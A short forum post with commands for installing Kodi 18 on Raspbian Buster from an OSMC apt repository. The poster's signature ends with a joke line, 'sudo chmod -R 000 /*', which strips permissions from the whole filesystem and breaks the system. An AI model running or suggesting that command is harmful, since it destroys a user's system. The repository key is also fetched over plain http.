Jump to content

[MINI] Installing Kodi 18 on Raspbian Buster

I'm writing this as much for personal future use as for anyone else who needs it - I did this once before, then forgot how I did it and wasted half an hour trying to piece it together again.

 

So without further ado,

add the repo to your apt sources by adding the following line to /etc/apt/sources.list:

deb http://download.osmc.tv/dev/gmc-18 gmc-18 main

get the gpg keys:

wget http://download.osmc.tv/dev/gmc-18/pubkey.asc
sudo apt-key add pubkey.asc

update your sources:

sudo apt update

install kodi:

sudo apt install kodi

 

Enjoy!

 

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*

Link to comment
Share on other sites

Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now

×